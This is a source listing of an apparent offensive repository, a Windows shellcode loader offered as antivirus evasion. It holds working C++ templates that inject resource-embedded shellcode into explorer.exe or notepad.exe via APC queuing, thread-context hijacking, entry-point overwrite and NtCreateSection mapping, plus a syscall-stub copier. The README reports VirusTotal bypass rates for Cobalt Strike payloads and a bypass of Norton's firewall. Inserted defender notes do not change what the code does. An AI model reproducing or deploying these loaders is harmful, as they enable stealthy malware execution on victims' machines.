21 | WriteProcessMemory(victimProcess, shellAddress, shellcode, shellcodeSize, NULL);
22 | QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);
23 | ResumeThread(threadHandle);
24 | return 0; // the process and thread handles in pi are never closed before returning
25 | }
--------------------------------------------------------------------------------
/plug/APC-Ijnect Load/APC.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 | #include
3 |
4 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
5 | { // Entry point: finds a process named explorer.exe, writes resource 100 into it and queues the written address as an APC to every thread of that process. None of the four parameters is read; no API result is checked.
6 | //1. Fetch the payload bytes and their size from resource ID 100
7 | UINT shellcodeSize = 0;
8 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
9 | if (shellcode == nullptr)
10 | {
11 | return 0; // no payload returned: exit silently with status 0
12 | }
13 | //2. Locate the target process by name in a process+thread snapshot, open it and allocate RWX memory inside it
14 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);
15 | PROCESSENTRY32 processEntry = { sizeof(PROCESSENTRY32) };
16 | if (Process32First(snapshot, &processEntry))
17 | {
18 | while (_wcsicmp(processEntry.szExeFile, L"explorer.exe") != 0) // case-insensitive match on the image name only
19 | {
20 | Process32Next(snapshot, &processEntry); // return value ignored: the loop does not terminate if no entry is named explorer.exe
21 | }
22 | }
23 | HANDLE victimProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, processEntry.th32ProcessID); // defender note: a PROCESS_ALL_ACCESS handle to explorer.exe from an unrelated process is visible to process-access telemetry (e.g. Sysmon Event ID 10)
24 | LPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); // defender note: cross-process RWX allocation
25 | //3. Write the payload into the target, collect the target's thread ids, and queue the payload address as an APC on each
26 | PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;
27 | WriteProcessMemory(victimProcess, shellAddress, shellcode, shellcodeSize, NULL);
28 | THREADENTRY32 threadEntry = { sizeof(THREADENTRY32) };
29 | std::vector threadIds; // NOTE(review): the element type appears to have been lost in extraction; the loop below reads the elements as DWORD
30 | if (Thread32First(snapshot, &threadEntry))
31 | {
32 | do {
33 | if (threadEntry.th32OwnerProcessID == processEntry.th32ProcessID) // keep only threads owned by the target process
34 | {
35 | threadIds.push_back(threadEntry.th32ThreadID);
36 | }
37 | } while (Thread32Next(snapshot, &threadEntry));
38 | }
39 | for (DWORD threadId : threadIds)
40 | {
41 | HANDLE threadHandle = OpenThread(THREAD_ALL_ACCESS, TRUE, threadId); // opened with full access and bInheritHandle TRUE; never closed
42 | QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL); // the same routine is queued to every collected thread
43 | Sleep(1000 * 2); // two-second pause between threads
44 | }
45 | return 0; // snapshot, process and thread handles are never closed before returning
46 | }
--------------------------------------------------------------------------------
/plug/Thread Hiijack-Inject Load/Thread.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 | #include
3 |
4 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
5 | { // Entry point: finds a process named notepad.exe, writes resource 100 into it and redirects one of its threads to the written address by rewriting the thread's instruction pointer. None of the four parameters is read; no API result is checked.
6 | //1. Fetch the payload bytes and their size from resource ID 100
7 | UINT shellcodeSize = 0;
8 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
9 | if (shellcode == nullptr)
10 | {
11 | return 0; // no payload returned: exit silently with status 0
12 | }
13 | //2. Locate the target process, write the payload into it, then suspend, retarget and resume one of its threads
14 | HANDLE targetProcessHandle;
15 | PVOID remoteBuffer;
16 | HANDLE threadHijacked = NULL;
17 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);
18 | THREADENTRY32 threadEntry;
19 | CONTEXT context;
20 | PROCESSENTRY32 processEntry = { 0 };
21 | processEntry.dwSize = sizeof(PROCESSENTRY32);
22 | if (Process32First(snapshot, &processEntry))
23 | {
24 | while (_wcsicmp(processEntry.szExeFile, L"notepad.exe") != 0) // case-insensitive match on the image name only
25 | {
26 | Process32Next(snapshot, &processEntry); // return value ignored: the loop does not terminate if no entry is named notepad.exe
27 | }
28 | }
29 | DWORD targetPID = processEntry.th32ProcessID;
30 | context.ContextFlags = CONTEXT_FULL;
31 | threadEntry.dwSize = sizeof(THREADENTRY32);
32 | targetProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID); // defender note: full-access handle to another process, visible to process-access telemetry (e.g. Sysmon Event ID 10)
33 | remoteBuffer = VirtualAllocEx(targetProcessHandle, NULL, shellcodeSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); // defender note: cross-process RWX allocation
34 | WriteProcessMemory(targetProcessHandle, remoteBuffer, shellcode, shellcodeSize, NULL);
35 | Thread32First(snapshot, &threadEntry);
36 | while (Thread32Next(snapshot, &threadEntry)) // the entry filled in by Thread32First above is not examined; the scan starts with the next one
37 | {
38 | if (threadEntry.th32OwnerProcessID == targetPID)
39 | {
40 | threadHijacked = OpenThread(THREAD_ALL_ACCESS, FALSE, threadEntry.th32ThreadID); // first matching thread wins
41 | break;
42 | }
43 | }
44 | SuspendThread(threadHijacked); // threadHijacked is still NULL here if no thread matched
45 | GetThreadContext(threadHijacked, &context);
46 | #ifdef _M_X64
47 | context.Rip = (DWORD_PTR)remoteBuffer; // 64-bit build: point the instruction pointer at the written payload
48 | #else
49 | context.Eip = (DWORD_PTR)remoteBuffer; // 32-bit build: same, via Eip
50 | #endif // x64
51 | SetThreadContext(threadHijacked, &context); // defender note: suspend -> get context -> set context -> resume on a thread of another process is the sequence behaviour-based detections key on; the thread's original instruction pointer is not saved anywhere
52 | ResumeThread(threadHijacked);
53 | return 0; // snapshot, process and thread handles are never closed before returning
54 | }
--------------------------------------------------------------------------------
/shellcodeLoader/shellcodeLoader.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | 头文件
23 |
24 |
25 | 头文件
26 |
27 |
28 | 头文件
29 |
30 |
31 | 头文件
32 |
33 |
34 | 头文件
35 |
36 |
37 |
38 |
39 | 源文件
40 |
41 |
42 | 源文件
43 |
44 |
45 | 源文件
46 |
47 |
48 |
49 |
50 | 资源文件
51 |
52 |
53 |
54 |
55 | 资源文件
56 |
57 |
58 |
59 |
60 | 资源文件
61 |
62 |
63 |
--------------------------------------------------------------------------------
/plug/OEP Hiijack-Inject Load/OEP.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 | #include
3 | #pragma comment(lib, "ntdll")
4 |
// Entry point of the "OEP Hiijack-Inject Load" template.
//
// What the visible code does, in order:
//   1. obtains a payload pointer and size from GetShellcodeFromRes(100, ...);
//   2. starts notepad.exe from a hard-coded path with CREATE_SUSPENDED;
//   3. asks NtQueryInformationProcess for the child's PEB address and reads the image
//      base pointer out of the PEB (PEB + 16, 8 bytes on x64; PEB + 8, 4 bytes on x86);
//   4. reads the first 4096 bytes of the child's image and takes
//      OptionalHeader.AddressOfEntryPoint from the PE headers;
//   5. overwrites the code at that entry point with the payload (WriteProcessMemory)
//      and resumes the child's suspended thread.
// The four WinMain parameters are not used. Every path returns 0.
//
// Analyst/defender view: no new executable region is allocated in the child, so rules
// keyed on remote RWX allocation do not fire. What remains observable is a child
// created suspended, cross-process reads of its PEB and headers, a cross-process
// write that lands inside the mapped image, and afterwards an in-memory image whose
// bytes at AddressOfEntryPoint differ from the file on disk.
//
// NOTE(review): no API result is checked, and pi.hProcess / pi.hThread are not closed.
5 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
6 | {
7 | //1.Get shellcode and shellcodesize from Resource by ID
8 | UINT shellcodeSize = 0;
// GetShellcodeFromRes is not defined in this file (the file includes ..\public.hpp).
9 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
10 | if (shellcode == nullptr)
11 | {
12 | return 0;
13 | }
14 | //2.Execute shellcode
15 | STARTUPINFOA si;
// NOTE(review): si is zeroed but si.cb is never set to sizeof(si).
16 | si = {};
17 | PROCESS_INFORMATION pi = {};
18 | PROCESS_BASIC_INFORMATION pbi = {};
// The two branches differ in the hard-coded path, the PEB offset and the pointer width.
19 | #ifdef _M_X64
20 | DWORD returnLength = 0;
// x64 build: path is c:\windows\notepad.exe (the x86 branch uses the system32 copy).
21 | CreateProcessA(0, (LPSTR)"c:\\windows\\notepad.exe", 0, 0, 0, CREATE_SUSPENDED, 0, 0, &si, &pi);
22 | // get target image PEB address and pointer to image base
23 | NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLength);
24 | LONGLONG imageBaseOffset = (LONGLONG)pbi.PebBaseAddress + 16;
25 | // get target process image base address
26 | LPVOID imageBase = 0;
27 | ReadProcessMemory(pi.hProcess, (LPCVOID)imageBaseOffset, &imageBase, 8, NULL);
28 | // read target process image headers
29 | BYTE headersBuffer[4096] = {};
30 | ReadProcessMemory(pi.hProcess, (LPCVOID)imageBase, headersBuffer, 4096, NULL);
31 | // get AddressOfEntryPoint
// NOTE(review): e_lfanew is used as an offset into the 4096-byte buffer without a range check.
32 | PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)headersBuffer;
33 | PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)headersBuffer + dosHeader->e_lfanew);
34 | LPVOID codeEntry = (LPVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint + (LONGLONG)imageBase);
35 | #else
36 | DWORD returnLength = 0;
37 | CreateProcessA(0, (LPSTR)"c:\\windows\\system32\\notepad.exe", 0, 0, 0, CREATE_SUSPENDED, 0, 0, &si, &pi);
38 | // get target image PEB address and pointer to image base
39 | NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLength);
40 | DWORD imageBaseOffset = (DWORD)pbi.PebBaseAddress + 8;
41 | // get target process image base address
42 | LPVOID imageBase = 0;
43 | ReadProcessMemory(pi.hProcess, (LPCVOID)imageBaseOffset, &imageBase, 4, NULL);
44 | // read target process image headers
45 | BYTE headersBuffer[4096] = {};
46 | ReadProcessMemory(pi.hProcess, (LPCVOID)imageBase, headersBuffer, 4096, NULL);
47 | // get AddressOfEntryPoint
48 | PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)headersBuffer;
49 | PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)headersBuffer + dosHeader->e_lfanew);
50 | LPVOID codeEntry = (LPVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint + (DWORD)imageBase);
51 | #endif // x64
52 | // write shellcode to image entry point and execute it
// shellcodeSize bytes starting at the entry point are replaced; the original code there is not saved.
53 | WriteProcessMemory(pi.hProcess, codeEntry, shellcode, shellcodeSize, NULL);
// The thread created suspended by CreateProcessA is released here.
54 | ResumeThread(pi.hThread);
55 | return 0;
56 | }
--------------------------------------------------------------------------------
/plug/NtCreateSection-Inject Load/NtCreateSection.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 | #include
3 |
// Local declarations for native-API items that this file does not take from an SDK
// header: the CLIENT_ID structure and function-pointer types for NtCreateSection,
// NtMapViewOfSection and RtlCreateUserThread. wWinMain below fills pointers of these
// types from ntdll with GetProcAddress, so the three names appear in the binary as
// strings rather than as import-table entries.
4 | typedef struct _CLIENT_ID { PVOID UniqueProcess; PVOID UniqueThread; } CLIENT_ID, *PCLIENT_ID;
5 | using pNtCreateSection = NTSTATUS(NTAPI*)(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL);
6 | using pNtMapViewOfSection = NTSTATUS(NTAPI*)(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect);
7 | using pRtlCreateUserThread = NTSTATUS(NTAPI*)(IN HANDLE ProcessHandle, IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, IN BOOLEAN CreateSuspended, IN ULONG StackZeroBits, IN OUT PULONG StackReserved, IN OUT PULONG StackCommit, IN PVOID StartAddress, IN PVOID StartParameter OPTIONAL, OUT PHANDLE ThreadHandle, OUT PCLIENT_ID ClientID);
8 |
// Entry point of the "NtCreateSection-Inject Load" template.
//
// What the visible code does, in order:
//   0. resolves NtCreateSection, NtMapViewOfSection and RtlCreateUserThread from ntdll;
//   1. obtains a payload pointer and size from GetShellcodeFromRes(100, ...);
//   2. creates a SEC_COMMIT section of the payload size with PAGE_EXECUTE_READWRITE,
//      maps it into this process as PAGE_READWRITE and into a process named
//      notepad.exe as PAGE_EXECUTE_READ, then copies the payload into the local view;
//   3. starts a thread in the target at the address of the remote view.
// The four WinMain parameters are not used. Every path returns 0.
//
// Analyst/defender view: there is no VirtualAllocEx or WriteProcessMemory call here.
// The payload reaches the target through the shared section, so what to look for is a
// section mapped into a foreign process as an executable view that is not backed by
// an image file, followed by a remote thread whose start address lies in that view.
//
// NOTE(review): the listing shows the character '§' in the NtCreateSection call; that
// is damage from text extraction ("&sect" rendered as an HTML entity), and the
// original arguments are the addresses of sectionHandle and sectionSize.
// NOTE(review): no NTSTATUS or handle is checked, and no handle is closed.
9 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
10 | {
11 | //0.Get functions
12 | pNtCreateSection fNtCreateSection = (pNtCreateSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtCreateSection"));
13 | pNtMapViewOfSection fNtMapViewOfSection = (pNtMapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtMapViewOfSection"));
14 | pRtlCreateUserThread fRtlCreateUserThread = (pRtlCreateUserThread)(GetProcAddress(GetModuleHandleA("ntdll"), "RtlCreateUserThread"));
15 | //1.Get shellcode and shellcodesize from Resource by ID
16 | UINT shellcodeSize = 0;
// GetShellcodeFromRes is not defined in this file (the file includes ..\public.hpp).
17 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
18 | if (shellcode == nullptr)
19 | {
20 | return 0;
21 | }
22 | //2.Get shellcode memory
23 | SIZE_T size = shellcodeSize;
24 | LARGE_INTEGER sectionSize = { size };
25 | HANDLE sectionHandle = NULL;
26 | PVOID localSectionAddress = NULL, remoteSectionAddress = NULL;
// The section is created with no file handle and SEC_COMMIT.
27 | fNtCreateSection(§ionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, NULL, (PLARGE_INTEGER)§ionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
// Local view: read/write only. The literal 2 is the InheritDisposition argument
// (ViewUnmap in the NT section-inherit enumeration).
28 | fNtMapViewOfSection(sectionHandle, GetCurrentProcess(), &localSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_READWRITE);
29 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
30 | PROCESSENTRY32 processEntry = { sizeof(PROCESSENTRY32) };
31 | if (Process32First(snapshot, &processEntry))
32 | {
// NOTE(review): the result of Process32Next is ignored, so this loop does not
// terminate when no process named notepad.exe exists.
33 | while (_wcsicmp(processEntry.szExeFile, L"notepad.exe") != 0)
34 | {
35 | Process32Next(snapshot, &processEntry);
36 | }
37 | }
38 | DWORD targetPID = processEntry.th32ProcessID;
39 | HANDLE targetHandle = OpenProcess(PROCESS_ALL_ACCESS, false, targetPID);
// Remote view of the same section: read/execute, never writable in the target.
40 | fNtMapViewOfSection(sectionHandle, targetHandle, &remoteSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_EXECUTE_READ);
// The write goes to the local view; both views map the same section.
41 | memcpy(localSectionAddress, shellcode, shellcodeSize);
42 | //3.Execute shellcode
43 | HANDLE targetThreadHandle = NULL;
// CreateSuspended is FALSE and no start parameter is passed.
44 | fRtlCreateUserThread(targetHandle, NULL, FALSE, 0, 0, 0, remoteSectionAddress, NULL, &targetThreadHandle, NULL);
45 | return 0;
46 | }
--------------------------------------------------------------------------------
/readme_cn.md:
--------------------------------------------------------------------------------
1 | # ShellcodeLoader
2 |
3 | Language: [English](Readme.md)
4 |
5 | Windows平台的shellcode免杀加载器。
6 |
7 | ## 功能特点
8 |
9 | 1. 自带多种加载方式。32位自带13种加载方式,64位自带12种加载方式。
10 |
11 | 2. 支持拓展。如果发现新的利用方式,按指定方式开发模板即可。
12 |
13 | 3. shellcode自动随机加密。使用时间为种子,生成128位密钥进行加密,相同shellcode出来的加载器的md5也不相同。
14 |
15 |
16 |
17 | ## 编译环境和方法
18 |
19 | 环境:生成器使用MFC实现UI,生成器和加载器模板均使用C++开发,VS2015静态编译。
20 |
21 | 方法:使用VS2015打开项目的解决方案(.sln),再进行编译即可。你也可以从[release](https://github.com/knownsec/shellcodeloader/releases/)下载成品。
22 |
23 |
24 |
25 | ## 文件组成
26 |
27 | 本工具由生成器(shellcodeLoader.exe),和众多加载器模板组成。不同的加载器模板需放入对应位数的目录。并最终放入生成器同目录下的DATA目录。
28 |
29 |
30 |
31 |
32 |
33 | ## 使用方法
34 |
35 | 1. **打开生成器**
36 |
37 | 
38 |
39 |
40 |
41 | 2. **将想要加载的shellcode源文件(.bin)拖入该窗口**
42 |
43 | 
44 |
45 |
46 |
47 | 3. **勾选加载器的运行位数,并选择你需要的配置选项,是否需要自启动(自带方式皆为注册表方式自启动),是否需要反沙箱(64位下多数杀软不需要该选项即可免杀)**
48 |
49 |
50 |
51 | 4. **选择你想要的加载方式,不同位数下的加载方式会有不同,其取决于DATA目录下对应的加载器模板。**
52 |
53 | 
54 |
55 |
56 |
57 | 5. **点击生成,则会在桌面生成最终的加载器。**
58 |
59 | 
60 |
61 | ## 拓展方法
62 |
63 | 1. 在你新的模板源文件前包含public.hpp.
64 |
65 |
66 |
67 | 2. 调用GetShellcodeFromRes()函数获取shellcode信息,注意100不可更改,除非你改了生成器中的资源序号。
68 |
69 | 
70 |
71 | 其返回shellcode的数据指针,并且,shellcodeSize就是shellcode的大小。多数情况下,这一步是不需要进行更改的,你可以在获取shellcode之后做任何事。
72 |
73 |
74 |
75 | 3. 按照你需要的方法加载shellcode,完成后进行编译(PS:请确保你进行了静态编译,且取消了调试符号链接).
76 |
77 | 
78 |
79 |
80 |
81 | 4. 将编译出来的文件进行指定命名,这里的命名就是UI上最终显示的加载方式名称,并将其后缀改为DAT,放入DATA目录下指定位数的目录中,生成器会自动获取该加载方式。
82 |
83 | 
84 |
85 |
86 |
87 | ### 关于public.hpp
88 |
89 | public.hpp源码中含有必要的注释。如果你想要其他的方式进行反沙箱,你可以更改antisandbox中的函数;如果你想要其他方式自启动,你可以更改autostart函数中的内容。其他函数体的内容多数情况下是不需要更改的。
90 |
91 |
92 |
93 | ## 使用效果
94 |
95 | VT检测效果,均以CS原始shellcode,并不勾选反沙箱为例:
96 |
97 | | 加载方式 | 未绕过率 |
98 | | ------------------------ | -------- |
99 | | CreateThreadpoolWait加载 | 3/72 |
100 | | Fiber加载 | 4/72 |
101 | | NtTestAlert加载 | 5/70 |
102 | | SEH异常加载 | 2/72 |
103 | | TLS回调加载 | 28/71 |
104 | | 动态加载 | 1/72 |
105 | | 动态加载plus | 28/71 |
106 | | 系统call加载 | 1/69 |
107 | | APC注入加载 | 6/72 |
108 | | Early Brid APC注入加载 | 4/72 |
109 | | NtCreateSection注入加载 | 2/71 |
110 | | 入口点劫持注入加载 | 3/72 |
111 | | 线程劫持注入加载 | 6/72 |
112 |
113 | 在动态加载方式勾选反沙箱之后,结果如下:
114 |
115 | 
116 |
117 |
118 |
119 | 使用该加载器bypass诺顿的智能防火墙出网拦截,并上线:
120 |
121 | 
122 |
123 |
124 |
125 | ## 参考
126 |
127 | - [反沙箱](https://0xpat.github.io/Malware_development_part_2/)
128 | - [RC4算法](https://www.52pojie.cn/thread-800115-1-1.html)
129 | - [CreateThreadpoolWait加载](https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait)
130 | - [Fiber加载](https://www.ired.team/offensive-security/code-injection-process-injection/executing-shellcode-with-createfiber)
131 | - [NtTestAlert加载](https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert)
132 | - [SEH异常加载](https://idiotc4t.com/code-and-dll-process-injection/seh-code-execute)
133 | - [TLS回调加载](https://idiotc4t.com/code-and-dll-process-injection/tls-code-execute)
134 | - [系统call加载](https://modexp.wordpress.com/2020/06/01/syscalls-disassembler/)
135 | - [APC注入](https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection)
136 | - [Early Bird APC注入](https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection)
137 | - [Early Brid APC注入原理](https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection)
138 | - [NtCreateSection注入](https://www.ired.team/offensive-security/code-injection-process-injection/ntcreatesection-+-ntmapviewofsection-code-injection)
139 | - [入口点劫持注入](https://www.ired.team/offensive-security/code-injection-process-injection/addressofentrypoint-code-injection-without-virtualallocex-rwx)
140 | - [线程劫持注入](https://idiotc4t.com/code-and-dll-process-injection/setcontext-hijack-thread)
141 | - 《加密与解密4》
142 |
--------------------------------------------------------------------------------
/plug/Syscall Load/Syscall.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 |
// Function-pointer type with the NtAllocateVirtualMemory signature. In this file the
// pointer is not taken from the loaded ntdll; wWinMain assigns it the value returned
// by GetSyscallStub.
3 | typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
4 |
// Converts a relative virtual address (RVA) into an offset in the raw file, using the
// section table that follows the optional header.
//
// Parameters:
//   nt  - NT headers of the PE file being examined.
//   rva - RVA to translate.
// Returns the raw file offset, or -1 converted to ULONG64 when rva is 0 or no section
// contains it.
//
// NOTE(review): the section table and its fields are trusted as read; nothing here
// checks them against the size of the mapped file.
5 | ULONG64 rva2ofs(PIMAGE_NT_HEADERS nt, DWORD rva) {
6 | PIMAGE_SECTION_HEADER sh;
7 | int i;
8 |
9 | if (rva == 0) return -1;
10 |
// First section header: start of the optional header plus SizeOfOptionalHeader.
11 | sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
12 | nt->FileHeader.SizeOfOptionalHeader);
13 |
// Sections are scanned from last to first.
14 | for (i = nt->FileHeader.NumberOfSections - 1; i >= 0; i--) {
// NOTE(review): the upper bound is inclusive, so an RVA exactly at
// VirtualAddress + SizeOfRawData is still attributed to this section.
15 | if (sh[i].VirtualAddress <= rva &&
16 | rva <= (DWORD)sh[i].VirtualAddress + sh[i].SizeOfRawData)
17 | {
18 | return sh[i].PointerToRawData + rva - sh[i].VirtualAddress;
19 | }
20 | }
21 | return -1;
22 | }
23 |
// Looks up an exported function by name in a PE file that is mapped as flat file data
// rather than loaded as an image: every RVA from the export directory is translated to
// a file offset with rva2ofs before it is added to hModule.
//
// Parameters:
//   hModule    - base address of the file data.
//   lpProcName - export name to find (compared with strcmp, so case-sensitive).
// Returns a pointer into the file data at the function's raw offset, or NULL when an
// argument is NULL, there is no export directory, there are no names, or one of the
// export tables cannot be translated.
//
// NOTE(review): the DOS and NT signatures are not verified, and the offsets taken from
// the headers are not checked against the size of the mapping.
24 | LPVOID GetProcAddress2(LPBYTE hModule, LPCSTR lpProcName)
25 | {
26 | PIMAGE_DOS_HEADER dos;
27 | PIMAGE_NT_HEADERS nt;
28 | PIMAGE_DATA_DIRECTORY dir;
29 | PIMAGE_EXPORT_DIRECTORY exp;
30 | DWORD rva, ofs, cnt;
31 | PCHAR str;
32 | PDWORD adr, sym;
33 | PWORD ord;
34 | if (hModule == NULL || lpProcName == NULL) return NULL;
35 | dos = (PIMAGE_DOS_HEADER)hModule;
36 | nt = (PIMAGE_NT_HEADERS)(hModule + dos->e_lfanew);
37 | dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
38 | // no exports? exit
39 | rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
40 | if (rva == 0) return NULL;
// rva2ofs returns ULONG64; the value is narrowed to DWORD here, and the == -1 tests
// below compare against the narrowed failure value.
41 | ofs = rva2ofs(nt, rva);
42 | if (ofs == -1) return NULL;
43 | // no exported symbols? exit
44 | exp = (PIMAGE_EXPORT_DIRECTORY)(ofs + hModule);
45 | cnt = exp->NumberOfNames;
46 | if (cnt == 0) return NULL;
47 | // read the array containing address of api names
48 | ofs = rva2ofs(nt, exp->AddressOfNames);
49 | if (ofs == -1) return NULL;
50 | sym = (PDWORD)(ofs + hModule);
51 | // read the array containing address of api
52 | ofs = rva2ofs(nt, exp->AddressOfFunctions);
53 | if (ofs == -1) return NULL;
54 | adr = (PDWORD)(ofs + hModule);
55 | // read the array containing list of ordinals
56 | ofs = rva2ofs(nt, exp->AddressOfNameOrdinals);
57 | if (ofs == -1) return NULL;
58 | ord = (PWORD)(ofs + hModule);
59 | // scan symbol array for api string
// The name table is walked from the last entry down to the first.
60 | do {
// NOTE(review): unlike the lookups above, the two rva2ofs results inside this loop
// are used without a failure check.
61 | str = (PCHAR)(rva2ofs(nt, sym[cnt - 1]) + hModule);
62 | // found it?
63 | if (strcmp(str, lpProcName) == 0) {
64 | // return the address
// The name index selects an ordinal, and the ordinal selects the function RVA.
65 | return (LPVOID)(rva2ofs(nt, adr[ord[cnt - 1]]) + hModule);
66 | }
67 | } while (--cnt);
68 | return NULL;
69 | }
70 |
// Path of the ntdll.dll file on disk; %SystemRoot% is expanded at run time in GetSyscallStub.
71 | #define NTDLL_PATH "%SystemRoot%\\system32\\NTDLL.dll"
72 |
// Returns a private, executable copy of the code of one ntdll export, taken from the
// ntdll.dll file on disk rather than from the ntdll already loaded in the process.
//
// Steps visible below: open the file read-only, map it as plain data (PAGE_READONLY,
// no image mapping), find the export with GetProcAddress2, find the exception-directory
// entry whose BeginAddress is that export to learn where the function ends, allocate
// PAGE_EXECUTE_READWRITE memory of that length and copy the bytes into it.
//
// Parameters:
//   lpSyscallName - export name to copy.
// Returns the address of the copy, or NULL if any step fails. The copy is not freed
// anywhere in this file.
//
// Analyst/defender view: presumably the point of copying from the on-disk file is that
// the copy is independent of any change made to the loaded ntdll, such as user-mode API
// hooks; the code itself only shows the copy. Telemetry that does not depend on such
// hooks still sees a data mapping of ntdll.dll opened by path, a private RWX
// allocation, and later a call into code that sits outside every loaded image.
73 | LPVOID GetSyscallStub(LPCSTR lpSyscallName)
74 | {
75 | HANDLE file = NULL, map = NULL;
76 | LPBYTE mem = NULL;
77 | LPVOID cs = NULL;
78 | PIMAGE_DOS_HEADER dos;
79 | PIMAGE_NT_HEADERS nt;
80 | PIMAGE_DATA_DIRECTORY dir;
81 | PIMAGE_RUNTIME_FUNCTION_ENTRY rf;
82 | ULONG64 ofs, start = 0, end = 0, addr;
83 | SIZE_T len;
84 | DWORD i, rva;
85 | CHAR path[MAX_PATH];
86 | ExpandEnvironmentStringsA(NTDLL_PATH, path, MAX_PATH);
87 | // open file
88 | file = CreateFileA(path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
89 | if (file == INVALID_HANDLE_VALUE) { goto cleanup; }
90 | // create mapping
91 | map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, NULL);
92 | if (map == NULL) { goto cleanup; }
93 | // create view
94 | mem = (LPBYTE)MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
95 | if (mem == NULL) { goto cleanup; }
96 | // try resolve address of system call
// addr is an address inside the file view, not inside a loaded module.
97 | addr = (ULONG64)GetProcAddress2(mem, lpSyscallName);
98 | if (addr == 0) { goto cleanup; }
99 | dos = (PIMAGE_DOS_HEADER)mem;
100 | nt = (PIMAGE_NT_HEADERS)((PBYTE)mem + dos->e_lfanew);
101 | dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
102 | // no exception directory? exit
103 | rva = dir[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;
